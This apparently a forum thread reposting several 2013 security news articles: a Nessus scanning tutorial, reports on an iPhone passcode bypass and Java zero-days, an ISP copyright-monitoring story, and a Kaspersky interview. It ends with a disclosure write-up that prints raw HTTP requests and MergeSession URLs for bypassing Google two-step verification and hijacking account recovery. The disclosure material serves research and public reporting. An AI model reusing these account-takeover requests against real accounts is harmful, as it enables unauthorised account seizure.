  4. Using Nessus for Network Scanning Using Nessus for Network Scanning Posted by: InfoSec Institute February 25, 2013 in Tutorials Leave a comment If you are looking for a vulnerability scanner, you might have come across several expensive commercial products and tools with a wide range of features and benefits. If a free, full-featured vulnerability scanner is on your mind, then it’s time you know about Nessus. This article covers installation, configuring, selecting policies, starting a scan, and analyzing the reports using NESSUS Vulnerability Scanner. Nessus was founded by Renuad Deraison in 1998 to provide the Internet community with a free remote security scanner. It is one of the full-fledged vulnerability scanners that allow you to detect potential vulnerabilities in systems. Nessus is the world’s most popular vulnerability scanning tool and is supported by most research teams around the world. The tool is free of cost for personal use in a non-enterprise environment. Nessus uses a web interface to set up, scan, and view reports. It has one of the largest vulnerability knowledge bases available; because of this KB, the tool is very popular. Key features Identifies vulnerabilities that allow a remote attacker to access sensitive information from the system Checks whether the systems in the network have the latest software patches Tries with default passwords, common passwords, on systems account Configuration audits Vulnerability analysis Mobile device audits Customized reporting For more details on the features of Nessus, visit: Nessus Vulnerability Scanner Features | Tenable Network Security. Operating systems that support Nessus Microsoft Windows XP/Vista/7 Linux Mac OS X (10.5 and higher) Free BSD Sun Solaris and many more Installation and configuration You can download the Nessus home feed (free) or professional feed from the following link: Nessus Vulnerability Scanner | Tenable Network Security Once you download the Nessus tool, you need to register with the Nessus official website to generate the activation key, which is required to use the Nessus tool. You can do it from the following link: (Obtain an Activation Code | Tenable Network Security) Click on “Nessus for Home” and enter the required details. An e-mail with an activation key will be sent to your mail. [*]Install the tool. (Installation of the Nessus tool will be quite confusing, so tutorials should be useful).For installation guidelines go to: (http://static.tenable.com/documentation/nessus_5.0_installation_guide.pdf). Check for your operating system and follow the steps mentioned in the PDF. [*] Open Nessus in the browser; normally it runs on port 8834. (http://localhost:8834/WelcomeToNessus-Install/welcome) and follow the screen. [*]Create an account with Nessus. [*]Enter the activation code you have obtained by registering with the Nessus website. Also you can configure the proxy if needed by giving proxy hostname, proxy username, and password. [*]Then the scanner gets registered with Tenable and creates a user. [*]Download the necessary plug-in. (It takes some time to download the plug-in; while you are watching the screen, you can go through the vast list of resources we have for Nessus users). Once the plug-ins are downloaded, it will automatically redirect you to a login screen. Provide the username and password that you have created earlier to login. Running the tool: Nessus gives you lots of choices when it comes to running the actual vulnerability scan. You’ll be able to scan individual computers, ranges of IP addresses, or complete subnets. There are over 1200 vulnerability plug-ins with Nessus, which allow you to specify an individual vulnerability or a set of vulnerabilities to test for. In contrast to other tools, Nessus won’t assume that explicit services run on common ports; instead, it will try to exploit the vulnerabilities. Among of the foundations for discovering the vulnerabilities in the network are: Knowing which systems exist Knowing which ports are open and which listening services are available in those ports Determining which operating system is running in the remote machine Once you login to Nessus using the web interface, you will be able to see various options, such as: Policies–Using which you can configure the options required for scan Scans–for adding different scans Reports–for analyzing the results The basic workflow of Nessus tool is to Login, Create or Configure the Policy, Run the Scan, and Analyze the Results. Policies Policies are the vulnerability tests that you can perform on the target machine. By default, Nessus has four policies. Figure A (Click to Enlarge) Figure (A) shows the default polices that come with Nessus tool. External network scan The policy is preconfigured so that Nessus scans externally-facing hosts that provide services to the host. It scans all 65,535 ports of the target machine. It is also configured with plug-ins required for web application vulnerabilities tests such as XSS. Internal network scan This policy is configured to scan large internal networks with many hosts, services, embedded systems like printers, etc. This policy scans only standard ports instead of scanning all 65,535 ports. Web app tests Nessus uses this policy to detect different types of vulnerabilities existing in web applications. It has the capability to spider the entire website to discover the content and links in the application. Once the spider process has been completed, Nessus starts to discover the vulnerabilities that exist in the application. Prepare for PCI DSS audits This policy has PCI DSS (Payment Card Industry Data Security Standards) enabled. Nessus compares the results with the standards and produces a report for the scan. The scan doesn’t guarantee a secure infrastructure. Industries or organizations preparing for PCI-DSS can use this policy to prepare their network and systems. Apart from these pre-configured policies, you can also upload a policy by clicking on “Upload” or configure your own policy for your specific scan requirements by clicking on “New Policy.” Configuring the policy Click on the Policies tab on the top of the screen Click on the New Policy button to create a new policy Under the General settings tab select the “setting type,” based on the scan requirement, such as Port Scanning, Performance Scanning, etc. Based on this type, Nessus prompts you for different options to be selected. For example, “Port Scanning” has the following options: Figure B (Click to Enlarge) Figure ( shows configuring options for Port Scanning Enter the port scan range. By default, Nessus scans all the TCP ports in the /etc/services file. You can limit the ports by specifying them manually (for example, 20-30). You have different scanners available, such as the Nessus SNMP scanner, SSH scanner, ping remote host, TCP Scanner, SYN scanner, etc. Enable by checking the check box as per the scan requirement. Enter the credentials for the scan to use. You can use a single set of credentials or a multiple set of credentials if you have to. You can also work it out without entering the credentials. The plug-in tab lists a number of plug-ins. By default, Nessus will have all the plug-ins enabled. You can enable or disable all the plug-ins at a time or enable few from the plug-in family as per the scan you’d like to perform. You can also disable some unwanted plug-ins from the plug-in family by clicking on that particular plug-in. Figure C (Click to Enlarge) Figure © shows the sub-plug-ins for the plug-in backdoors In Figure ©, the green indicates the parent plug-in and the blue indicates the sub-plug-ins or the plug-ins under the parent plug-in (backdoor). You can enable or disable by simply clicking on the enabled button. In Policy Preferences, you are provided with a drop-down box to select different types of plug-ins. Select the plug-in based on the scan requirement and specify the settings as per the plug-in requirement. Click “Finish” once completed. For example: configure the database. Figure D (Click to Enlarge) Figure (D) shows the configuration of database settings plug-in Scans Once you are done configuring the policies as per your scan requirement, you need to configure the scan details properly. You can do it under the Scan tab Under the Scan tab, you can create a new scan by clicking “New Scan” on the top right. Then a pop-up appears where you need to enter the details, such as Scan Name, Scan Type, Scan Policy, and Target. Scan Name: The name that you want to give to the scan. Scan Type: You have options to run the scan immediately by selecting “RUN NOW.” Or you can make a template which you can launch later when you want to run the scan. All the templates are moved under the Template tab beside the Scan tab. Scan Policy: Select the policy that you have configured previously in the policies section. Select Target: Enter the target machine that you are planning to test. Depending upon the targets, Nessus takes time to scan the targets. Results Once the scanning process has been completed successfully, results can be analyzed. You can see the name of the scan under the Results section. Click on the name to see the report. Hosts–Specifies all the target systems you have scanned. Vulnerabilities–Displays all the vulnerabilities on the target machine that has been tested. Export Results–You can export the results into various formats such as html, pdf, etc. You can also select an individual section or complete result to export based on your requirement. Let us try an example now I have configured a policy named “Basic Scan.” We have many options while configuring or building the policy, such as port scanners, performance of the tool, advanced, etc. Figure E (Click to Enlarge) Figure (E) shows configuration settings of Port Scanning for the policy “Basic Scan.” You don’t need credentials now, so skip the Credentials tab and move to the Plug-ins tab. You need to configure the specific plug-in as per the requirements of the scan that you want to perform on the remote machine. Figure F (Click to Enlarge) Figure (F) shows the plug-ins I have enabled for the policy “Basic Scan.” I have enabled a few plug-ins for the Windows machine scan. Figure G (Click to Enlarge) Figure (G) shows configuring the scan. I have configured the scan to run instantly with the policy that I have created earlier. And the scan target specifies the IP address I want to scan Once all the details have been entered, click on Create Scan, which shows that the Scan is running, as shown in Figure (H) below: Figure H (Click to Enlarge) Once the scanning has been completed, you can see the results in Results tab. Figure (I) shows the same. Figure I (Click to Enlarge) Double clicking on the title displays the scan results. Figure J (Click to Enlarge) Figure (J) shows the Hosts details. It includes all the targets that you have scanned during the test. Double clicking on the host address displays the vulnerabilities Nessus has identified during the test. You can also click on the Vulnerabilities tab to check out the vulnerabilities. Figure K (Click to Enlarge) Figure (K) shows the Vulnerabilities that Nessus found during its scan. Nessus marks the risk as high, medium, info, etc. Clicking on Vulnerability gives you brief description of it. For example, let us go with the Netstat port scanner, which displays the following information: Figure L (Click to Enlarge) Figure (L) shows the ports opened in the target machine. In the same manner you can analyze complete details by clicking on the vulnerabilities. Nessus also suggests solutions or remedies for the vulnerabilities with a few references. Conclusion Nessus is a tool that automates the process of scanning the network and web applications for vulnerabilities. It also suggests solutions for the vulnerabilities that are identified during the scan. Kamal B is a security researcher for InfoSec Institute. InfoSec Institute is an information security training company that offers popular CEH v8 Ethical Hacking Boot Camps. References http://static.tenable.com/documentation/nessus_5.0_installation_guide.pdf http://static.tenable.com/documentation/nessus_5.0_HTML5_user_guide.pdf http://static.tenable.com/documentation/WhatIsNewNessus5.pdf Sursa: Using Nessus for Network Scanning | ZeroSecurity
  5. [h=1]Another iPhone Passcode Bypass Vulnerability Discovered[/h]by Christopher Brook February 25, 2013, 7:00AM It’s getting hard to keep track of all the bugs piling up for Apple’s iPhone. Now it seems a glitch in the iOS kernel of Apple’s much maligned iOS 6.1 is responsible for yet another passcode bypass vulnerability, the second to surface this month. Attackers can apparently access users' photos, contacts and more by following a series of steps on an iPhone running iOS 6.1.The vulnerability was detailed in a post on the Full Disclosure mailing list late last week by Benjamin Kunz Mejri, founder and CEO of Vulnerability Lab. Similar to the iPhone's passcode vulnerability, the exploit involves manipulating the phone’s screenshot function, its emergency call function and its power button. Users can make an emergency call (911 for example) on the phone and then cancel it while toggling the power on and off to get temporary access to the phone. shows a user flipping through the phone’s voicemail list and contacts list while holding down the power button. From there an attacker could get the phone’s screen to turn black before it can be connected to a computer via a USB cord. The device’s photos, contacts and more “will be available directly from the device hard drive without the pin to access,” according to the advisory.The first half of the exploit borrows heavily from last week’s vulnerability – and the Lab notes this in the caption of the video that documents its proof of concept (“already release by other researcher”). It’s the second bypass – which can be achieved by holding down the power button, the screenshot button and the emergency button – that’s interesting; as it makes the phone’s screen, minus the top bar, go black. From there it can be plugged into a computer and the information can be harvested via iTunes from the phone’s hard drive with read/write access. In the accompanying video, the phone’s images and address book can be viewed on a PC without the user having to enter the phone’s passcode thanks to iTunes’ iPhone sync function. Apple updated iOS 6.1 to 6.1.2 earlier this week but failed to address the recent passcode bug, instead opting to patch an Exchange calendar bug that had long affected users’ phone’s network activity and battery. Last week representatives from Apple told Wall Street Journal’s AllThingsD they were aware of the first passcode bug and were developing a fix for "a future software update.” Sursa: Another iPhone Passcode Bypass Vulnerability Discovered | threatpost
  6. CyberSecurity for the Next Generation: CIS Winners Named! February 25, 2013 Kaspersky Team Three young researchers have made their mark on the cybersecurity world and will now present their work at the final of the ‘CyberSecurity for the Next Generation’ student conference in London. The winning entries were selected from 14 research papers presented in person by their authors at the State Engineering University of Armenia. A jury of university lecturers, IT specialists and Kaspersky Lab experts named Vahram Hrayr Darbinyan’s work “Detecting DDoS attacks on digital publication hosting services” the best. The prize for the research with the greatest practical value went to Maxim Shudrak’s “A new technique and tool for vulnerabilities detection in binary executables”. Vladimir Hovsepyan’s research study “Web application for investigation and analysis of asymmetric cryptographic algorithms” received the award for innovation and originality. The jury also awarded several special prizes for the quality of presentation, social significance of the research, etc. The winners all expressed their delight and surprise with their success, and will be looking to develop their presentation and English language skills between now and the grand finale. Maxim even promised to take an intensive course of English. Congratulations to the winners and best wishes for the final! Even those who didn’t win agreed that participation was very useful – having gained valuable experience and made some interesting new acquaintances. See for yourself in this album: Sursa: CyberSecurity for the Next Generation: CIS Winners Named!
  7. [h=1]ISPs Now Monitoring for Copyright Infringement[/h] By David Kravets 02.25.13 2:04 PM The nation’s major internet service providers on Monday said they are beginning to roll out an initiative to disrupt internet access for online copyright scofflaws. The so-called “Copyright Alert System” is backed by the President Barack Obama administration and was pushed heavily by record labels and Hollywood studios. The plan, more than four years in the making, includes participation by AT&T, Cablevision Systems, Comcast, Time Warner Cable and Verizon. Others could soon join. After four offenses, the historic plan calls for these residential internet providers to initiate so-called “mitigation measures” (.pdf) that might include reducing internet speeds and redirecting a subscriber’s service to an “educational” landing page about infringement. The plan does not prevent content owners from suing internet subscribers. The Copyright Act allows damages of up to $150,000 per infringement. The Center for Copyright Information, the new group running the program, maintains it is not designed to terminate online accounts for repeat offenders. However, the Digital Millennium Copyright Act demands that internet service providers kick off repeat copyright scofflaws. The program monitors peer-to-peer file-sharing services via internet snoop MarkMonitor of San Francisco. The surveillance was to have been deployed sooner. But the various delays included Hurricane Sandy and ISP reluctance to join. Peer-to-peer monitoring is easily detectable. That’s because IP addresses of internet customers usually reveal themselves during the transfer of files. Cyberlockers, e-mail attachments, shared Dropbox folders and other ways to infringe are not included in the crackdown. To be sure, the deal is not as draconian as it could have been. The agreement, heavily lobbied for by the Recording Industry Association of America and the Motion Picture Association of America, does not require internet service providers to filter copyrighted material transiting their networks. U.S. internet service providers and the content industry have openly embraced that kind filtering. The Federal Communications Commission, in crafting its net neutrality rules, has all but invited the ISPs to practice it. On a scofflaw’s first offense, internet subscribers will receive an e-mail “alert” from their ISP saying the account may have been misused for online content theft. On the second offense, the alert might contain an “educational message” about the legalities of online file sharing. On the third and fourth infractions, the subscriber will likely receive a pop-up notice “asking the subscriber to acknowledge receipt of the alert.” Sursa: ISPs Now Monitoring for Copyright Infringement | Threat Level | Wired.com
  8. [h=1]Two More Java Zero Days Found by Polish Research Team[/h]by Christopher Brook February 25, 2013, 3:26PM The seemingly endless list of critical zero day bugs found in Java grew longer today with news that one of the flaws fixed in Oracle’s recent patches for the product is under attack and when that bug is paired with another, separate vulnerability, the sandbox in the latest build of Java can be bypassed.Polish security firm Security Explorations sent details regarding the two vulnerabilities, “issue 54” and “issue 55,” including proof of concept code, to Oracle for review today. Oracle confirmed it has received the information, according to an update to Security Explorations’s bug reporting status page but has not confirmed the flaws. Very little of the attack was officially disclosed by the company but CEO Adam Gowdiak did acknowledge that the vulnerability only affects Java’s SE 7 software – which saw Update 15 released last Tuesday – and according to reports, stems from a problem with Java Reflection API. Gowdiak and his team at Security Explorations have proved adept at finding holes in the much maligned Java over the past year or so. The company previously developed a sandbox escape for versions 5, 6, and 7 of the software last fall before advocating for the removal of the framework. The latest Java vulnerability is apparently unrelated to a separate vulnerability Gowdiak found last fall that Oracle claimed it would wait until February to fix that could’ve given an attacker free reign over a user’s computer by using a malicious Java applet. It’s possible though that the flaw could be related to a similar Java security sandbox bypass technique that was unearthed by Gowdiak in January after Java pushed Update 11 of the product. According to Softpedia, Gowdiak claimed he tested the flaw in the first release of Java 7, along with Updates 11 and 15. In January, Esteban Guillardoy of Immunity Inc., said “attackers could pair that vulnerability with the reflection API with recursion in order to bypass Java security checks.” Apple, Facebook, Microsoft and other high profile companies made headlines last week after acknowledging that a Java vulnerability left the companies open to attack via iPhoneDevSDK, a forum that was hosting malware that was being spread by malicious JavaScript. Sursa: Two More Java Zero Days Found by Polish Research Team | threatpost
  9. INTERVIU Costin Raiu, omul care intr? în intimitatea viru?ilor: „Dac? Octombrie Ro?u ar fi femeie, ar fi complicat? ?i ar vorbi limba rus? la perfec?ie“ 18 februarie 2013, 20:39 „Adev?rul“ a vorbit cu Costin Raiu, Director de Cercetare ?i Analiz? la Kaspersky, despre modul în care s-au transformat viru?ii în ultimii ani ?i care sunt amenin??rile informatice cu care ne-am putea confrunta în 2013. Costin Raiu, Director de Cercetare ?i Analiz? în cadrul firmei de securitate Kaspersky, este de p?rere c? România este pe calea cea bun? în ceea ce prive?te securitatea cibernetic? ?i apreciaz? noua Strategie de Securitate Cibernetic?, aprobat? luna aceasta de CSAT. Analistul a explicat, pentru „Adev?rul”, cum a ac?ionat virusul Octombrie Ro?u ?i a atras aten?ia asupra unui nou atac informatic complex care se folose?te de o vulnerabilitate a programului Adobe Reader. Ce a f?cut, mai exact, virusul Octombrie Ro?u? Cel mai interesant lucru la Octombrie Ro?u sunt victimele. Cele mai multe erau institu?ii diplomatice, guvernamentale, companii de energie, inclusiv energie nuclear?, institu?ii de cercetare ?tiin?ific?, contractori militari ?i firme care se ocup? de industria petrolier? ?i gaze. În mai 2007 au început atacurile ?i erau axate pe extragerea de informa?ii de la victime, informa?ii care putea oferi avantaje geostrategice. De exemplu, s-au ob?inut conversa?iile dintre ambasade, informa?ii confiden?iale de la diverse institu?ii. E interesant c? atacul nu a fost depistat timp de atât de mul?i ani. Au fost mul?i care au v?zut fragmente din puzzle. Dac? Octombrie Ro?u ar fi o femeie, cum a?i descrie-o? Înalt?, complicat? ?i vorbe?te limba rus? la perfec?ie. Prefer? tortul diplomat, dar ?i snack-urile tip „energy bar“. Are o afinitate pentru accesoriile chineze?ti rare ?i c?l?tore?te mult în Europa de Est. S?pt?mâna trecut? unul dintre atacurile cele mai mari au fost date prin programul Adobe Reader. Ce pute?i s?-mi spune?i despre acesta? Din cauza lui nu am dormit. Nu e un atac obi?nuit, e un atac extraordinar de sofisticat care apare cam o dat? pe an. O vulnerabilitate le permite hackerilor s? copiezi ni?te fi?iere pe sistem ?i o a doua le permite s? scape din sandbox. Adobe Reader are un fel de sandbox prin care blocheaz? accesul la sistem. Cine a f?cut atacul este extraordinar de experimentat. Este în cod care verific? s? mearg? pe sisteme cu Adobe Reader în limba arab?, ebraic?, englez? ?i greac?. Nu cunoa?tem deocamdat? efectul. Noi tragem concluzia c? avem de a face cu un atac sponsorizat de un stat, de cel mai înalt nivel. Investi?ia a fost enorm?. Crede?i c? România este preg?tit? s? se apere în fa?a unor astfel de atacuri informatice? E interesant c? Red October a fost depistat în România. De curând, a fost aprobat? în CSAT Strategia de Securitate Cibernetic?, care vine cu o mul?ime de m?suri bune. Statul nu are suficiente resurse financiare s? analizeze astfel de atacuri ?i nici exper?i care s? fie de acela?i nivel cu persoanele care din asta tr?iesc. Cea mai bun? m?sur? din aceast? strategie e faptul c? încurajeaz? colaborarea dintre domeniul public ?i cel privat. Acum dou? s?pt?mâni Comisia European? a anun?at o nou? strategie de securitate cibernetic?. Crede?i c? m?sura a fost luat? prea târziu? Nu a fost luat? prea târziu, a fost luat? la momentul potrivit. Noi am analizat propunerea ?i mi se pare foarte bun?. Am remarcat ?i acolo c? se încurajeaz? formarea de echipe de r?spuns ?i încurajeaz? colaborarea cu domeniul privat. Crede?i c? urm?torul R?zboi Mondial se va purta pe cale informatic?? R?zboiul se poart? deja pe cale informatic?. În momentul de fa??, dac? ne uit?m la conflictele existente, observ?m dou? mari componente. Astfel, avem, pe de o parte, dronele. Sunt mii de drone care încep s? înlocuiasc? infanteria ?i avioanele. Am citit c? Pentagonul antreneaz? mai mul?i pilo?i de drone decât pilo?i de avioane. Avem ?i componenta informatic?. Aici observ?m anumite vârfuri de aisberg. ?tim c? se întâmpl? ceva, dar nu ?tim exact ce. Exemple ar fi viru?ii Flame, Gauss, Duku, Stuxnet. În 2012 a explodat ?i am observat c? statele au declarat c? î?i cresc investi?iile în componenta de r?zboi cibernetic. E mai ieftin ?i ofer? avantaje precum anonimitatea ?i efectele pot fi cel pu?in de devastatoare f?r? pierderi de vie?i umane. http://www.youtube.com/watch?v=t6Qc_-EaaU8&feature=player_embedded La ce s? ne a?tept?m pentru 2013 ?i care este strategia Kaspersky? Vom vedea din ce în ce mai multe atacuri la nivel înalt – sponsorizate de actori statali. Vom vedea mai multe atacuri pe Mac, dar ?i pe Android. Observ?m ?i cre?terea num?rului de atacuri care folosesc elemente criptografice. Acestea sunt importante fiindc? deja ne mut?m pe a?a-zisa „e-guvernare“. Aceste atacuri pot avea efecte uria?e asupra sistemelor de guvernare. Vom vedea ?i o cre?tere a num?rului de atacuri de tip „zero-day“ care constau în utilizarea vulnerabilit??ilor anumitor programe. Care este cel mai periculos tip de malware? Din punctul de vedere al utilizatorului de rând exist? dou? mari clase: troienii care pot fura informa?ii bancare ?i ransomware-ul – troieni care blocheaz? calculatoarele ?i solicit? bani pentru a-l debloca. Am cunoscut o persoan? care a venit la mine ?i mi-a povestit cum a desc?rcat un antivirus fals. Dup? o scanare cu respectivul program i s-a spus c? are 30 de viru?i, a ap?sat pe „cur???“ ?i a ap?rut mesajul c? versiunea gratuit? nu poate ?terge viru?i. Dup? achizi?ionarea variantei pro, dispare orice problem?. Nu sf?tuiesc lumea s? ofere bani în astfel de cazuri, c?ci se rezolv? u?or. Din perspectiva institu?ional? avem atacuri care se bazeaz? pe spionaj economic ?i pe sabotaj la nivelul de infrastructuri critice. Vedem din ce în ce mai multe cazuri. Am v?zut Stuxnet, Red October – spionaj sponsorizat de c?tre un actor statal. În final, cum ar?tau viru?ii de acum 10-15 ani comparativ cu cei din prezent? Un exemplu foarte bun este virusul „Bad Sectors 3428“, pe care l-am analizat într-o noapte. Dac? printai sursa unui virus din 1994, aceasta înc?pea pe 2-3 pagini. Putea fi analizat într-un timp decent. Pe m?sur? ce am analizat mai mul?i viru?i mi-a crescut ?i viteza. În loc de o noapte, îmi lua o or?, apoi 15 minute, apoi 5 minute. În zilele noastre s-a schimbat enorm situa?ia. Este foarte dificil ca un om s? poat? analiza singur un virus din 2012-2013. E nevoie de o echip? de oameni. Dac? ar fi s? print?m sursa unui astfel de virus ar fi nevoie de câteva sute de mii de pagini. Complexitatea a crescut enorm, la fel ?i num?rul viru?ilor. Dac? în 1996 ap?rea câte un virus nou pe s?pt?mân? sau pe lun?, în ziua de azi avem 200.000 de viru?i noi pe zi. Cine este Costin Raiu? Costin Raiu este unul dintre cei mai de seam? exper?i în probleme de cibersecuritate, având peste 18 ani de experien?? în domeniu. Primul antivirus scris de el, în 1994, a fost preluat de compania GeCAD ?i vândut sub numele de RAV. Din 2001, Costin Raiu activeaz? în cadrul firmei Kaspersky iar din 2010 este conduce divizia Global Research & Analysis Team care se ocup? de analizarea celor mai noi amenin??ri ?i dezvoltarea de solu?ii pentru acestea. Descoperi?i mâine mai multe detalii despre viru?ii care ne pot afecta calculatoarele personale ?i alte p?r?i fascinante în interviul complet cu specialistul Kaspersky, Costin Raiu. Sursa: INTERVIU Costin Raiu, omul care intr? în intimitatea viru?ilor: „Dac? Octombrie Ro?u ar fi femeie, ar fi complicat? ?i ar vorbi limba rus? la perfec?ie“ | adevarul.ro
  10. Bypassing Google’s Two-Factor Authentication By Adam Goodman on February 25, 2013 TL;DR – An attacker can bypass Google’s two-step login verification, reset a user’s master password, and otherwise gain full account control, simply by capturing a user’s application-specific password (ASP). (With all due respect to Google’s “Good to Know” ad campaign) Abusing Google’s (not-so-) Application-Specific Passwords Google’s 2-step verification makes for an interesting case study in some of the challenges that go with such a wide-scale, comprehensive deployment of strong authentication. To make 2-step verification usable for all of their customers (and to bootstrap it into their rather expansive ecosystem without breaking everything), Google’s engineers had to make a few compromises. In particular, with 2-step verification came a notion of “Application-Specific Passwords” (ASPs). Some months ago, we found a way to (ab)use ASPs to gain full control over Google accounts, completely circumventing Google’s 2-step verification process. We communicated our findings to Google’s security team, and recently heard back from them that they had implemented some changes to mitigate the most serious of the threats we’d uncovered. Here’s what we found: Application-Specific Passwords Generally, once you turn on 2-step verification, Google asks you to create a separate Application-Specific Password for each application you use (hence “Application-Specific”) that doesn’t support logins using 2-step verification. Then you use that ASP in place of your actual password. In more-concrete terms, you create ASPs for most client applications that don’t use a web-based login: email clients using IMAP and SMTP (Apple Mail, Thunderbird, etc.); chat clients communicating over XMPP (Adium, Pidgin, etc.), and calendar applications that sync using CalDAV (iCal, etc.). Even some of Google’s own software initially required you to use ASPs – e.g. to enable Chrome’s sync features, or to set up your Google account on an Android device. More recently, these clients have generally shifted to using methods along the lines of OAuth. In this model, when you first log in using a new application or device, you get an authorization prompt — including 2-step verification — in a webview; after a successful login, Google’s service returns a limited-access “token”, which is used to authenticate your device/application in the future. Actually, OAuth-style tokens and ASPs are notionally very similar — in each case, you end up creating a unique authorization token for each different device/application you connect to your Google account. Further, each token can be individually revoked without affecting the others: if you lose your smartphone, you can make sure that it no longer has access to your GMail account without having to memorize a new password. So then, the major differences between OAuth tokens and ASPs are: OAuth tokens are created automatically, while ASPs are a thoroughly manual affair. You have to log into Google’s account settings page to create one, and then transcribe (or copy/paste) it into your application. OAuth tokens use a flexible authorization model, and can be restricted to accessing only certain data or services in your account. By contrast, ASPs are — in terms of enforcement — not actually application-specific at all! This second point deserves some more attention. If you create an ASP for use in (for example) an XMPP chat client, that same ASP can also be used to read your email over IMAP, or grab your calendar events with CalDAV. This shouldn’t be particularly surprising. In fact, Eric Grosse and Mayank Upadhyay of Google even call this weakness out in their recent publication about Google’s authentication infrastructure: “Another weakness of ASP is the misimpression that is provides application-limited rather than full-scope account access.” - Authentication at Scale, appearing in IEEE S&P Magazine vol. 11, no. 1 As it turns out, ASPs can do much, much more than simply access your email over IMAP. In fact, an ASP can be used to log into almost any of Google’s web properties and access privileged account interfaces, in a way that bypasses 2-step verification! Auto-Login with Chrome In recent versions of Android (and ChromeOS), Google has included, in their browser, an “auto-login” mechanism for Google accounts. After you’ve linked your device to a Google account, the browser will let you use your device’s existing authorization to skip Google’s web-based sign-on prompts. (There is even experimental support for this in desktop versions of Chrome; you can enable it by visiting chrome://flags/.) Until late last week, this auto-login mechanism worked even for the most sensitive parts of Google’s account-settings portal. This included the “Account recovery options” page, on which you can add or edit the email addresses and phone numbers to which Google might send password-reset messages. In short, if you can access the “Account recovery options” page for a Google account, then you can seize complete control of that account from its rightful owner. So, to recap: You can use an ASP to link an Android device (or Chromebook, etc.) to a Google account, and With that linked device, you could (until very recently) access the account’s recovery options (using auto-login to bypass any sign-on pages), change the password-reset settings, and gain full control over the account. This was enough for us to realize that ASPs presented some surprisingly-serious security threats, but we wanted to understand how the underlying mechanisms actually worked. Technical Details On his excellent Android Explorations blog, Nikolay Elenkov documented a rather in-depth investigation into the web auto-login mechanism on Android. This was a great starting point but still left a few gaps for our purposes. We wanted to learn how to exploit Google’s auto-login mechanism without using an Android device (or Chromebook, etc.) at all. To do this, we set up an an intercepting proxy with a custom CA certificate to watch the network traffic between an Android emulator instance and Google’s servers. When adding a Google account to the emulator (using an ASP), we saw the following request: POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=user%40domain.com&has_permission=1&add_account=1&EncryptedPasswd=AFcb4...&service=ac2dm&source=android&androidId=3281f33679ccc6c6&device_country=us&operatorCountry=us?=en&sdk_version=17 The response body contained, among other things: Token=1/f1Hu... While the URL and some of the parameters aren’t documented, this very closely resembles the Google ClientLogin API. To recreate this request on our own, we’d need only to figure out what values to fill in for the EncryptedPasswd and androidId parameters. It turns out that androidId is simple; we’re confident in assuming it is the same “Android ID” mentioned in the Android API Docs: a randomly-generated 64-bit value that is intended to uniquely identify an Android device. Another of Elenkov’s blog posts led us to believe that EncryptedPasswd might be our ASP, encrypted with a 1024-bit RSA public key included in the Android system. EncryptedPasswd was, in fact, 130 bytes of (base64-encoded) binary data, so this seems quite possible. However, before digging too deeply into this, we decided to try replacing the EncryptedPasswd parameter with the (unencrypted) Passwd parameter from the ClientLogin API documentation, set to our ASP: POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=user%40domain.com&has_permission=1&add_account=1&Passwd=xxxxxxxxxxxxxxxx&service=ac2dm&source=android&androidId=3281f33679ccc6c6&device_country=us&operatorCountry=us?=en&sdk_version=17 This worked! Again, we got a response containing what appeared to be a valid Token. The token created by the android.clients.google.com endpoint was now visible in our account’s “Connected Sites, Apps, and Services” interface, appearing to offer “Full Account Access”: Continuing on with our captured traffic, we subsequently saw two different workflows for the browser’s auto-login functionality. The simpler of the two was another ClientLogin-style request, but using the returned Token: POST /auth HTTP/1.1 Host: android.clients.google.com ... accountType=HOSTED_OR_GOOGLE&Email=user%40domain.com&has_permission=1&Token=1%2Ff1Hu...&service=weblogin%3Acontinue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&source=android&androidId=3281f33679ccc6c6&app=com.android.browser&client_sig=61ed377e85d386a8dfee6b864bd85b0bfaa5af81&device_country=us&operatorCountry=us?=en&sdk_version=17 This request returned a response body along the lines of: Auth=https://accounts.google.com/MergeSession?args=continue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&uberauth=AP...&source=AndroidWebLogin Expiry=0 From this request, we determined that the general format for the service parameter was weblogin:continue=url_encode(destination_url). We then decided to try specifying this service in our original request – i.e. with an ASP instead of the Token (and without trying to determine the provenance of an unknown client_sig parameter): POST /auth HTTP/1.1 Host: android.clients.google.com ... device_country=us&accountType=HOSTED_OR_GOOGLE&androidId=3281f33679ccc6c6&Email=user%40domain.com?=en&service=weblogin%3Acontinue%3Dhttps%253A%2F%2Faccounts.google.com%2FManageAccount&source=android&Passwd=xxxxxxxxxxxxxxxx&operatorCountry=us&sdk_version=17&has_permission=1 This returned us the same form of response: Auth=https://accounts.google.com/MergeSession?args=continue%3Dhttps%253A%252F%252Faccounts.google.com%252FManageAccount&uberauth=AP...&source=AndroidWebLogin Expiry=0 That MergeSession URL is the key here. If you open it in an un-authenticated web browser after making this API call (you have to do this quickly; it has a very short expiration window), you will be immediately logged into your account settings page, with no authentication prompt! So: given nothing but a username, an ASP, and a single request to https://android.clients.google.com/auth, we can log into any Google web property without any login prompt (or 2-step verification)! Google’s Fix As we mentioned before, this worked on even the most sensitive sections of Google’s account-settings portal. An attacker could perform a variety of privileged actions using a victim’s ASP: An attacker could pass https://accounts.google.com/b/0/UpdateAccountRecoveryOptions?hl=en&service=oz as the destination URL in the API request, and the resulting MergeSession URL would take them immediately to the “Account recovery options” page, in which they could modify the password recovery email address to perform a reset of the victim’s master password. Similarly, an attacker could pass https://accounts.google.com/b/0/SmsAuthConfig?hl=en, and the resulting URL would take them to the settings for 2-step verification, in which they could create/edit ASPs, or turn off 2FA for the account altogether. This is no longer the case as of February 21st, when Google engineers pushed a fix to close this loophole. As far as we can tell, Google is now maintaining some per-session state to identify how you authenticated — did you log in using a MergeSession URL, or the normal username, password, 2-step verification flow? The account-settings portal will only allow you to access security-sensitive settings in the latter case (i.e. if you logged in using a MergeSession URL, it will give you a username/password/2-step-verification prompt that you can’t skip.) Was This So Bad? We think it’s a rather significant hole in a strong authentication system if a user still has some form of “password” that is sufficient to take over full control of his account. However, we’re still confident that — even before rolling out their fix — enabling Google’s 2-step verification was unequivocally better than not doing so. These days, attackers still have a lot of success using some very simple methods to take over accounts. For example, by: Creating a phishing site to trick users into giving up their passwords. Exploiting the fact that users often share passwords between sites, by cracking a (poorly-protected) password database from one site, and using the recovered passwords to attempt to break into users’ accounts on other sites. Both of these examples represent types of attacks that should be prevented simply by having users apply common sense and good digital hygiene – i.e. don’t use the same password on more than one site, and don’t click suspicious links in email messages. 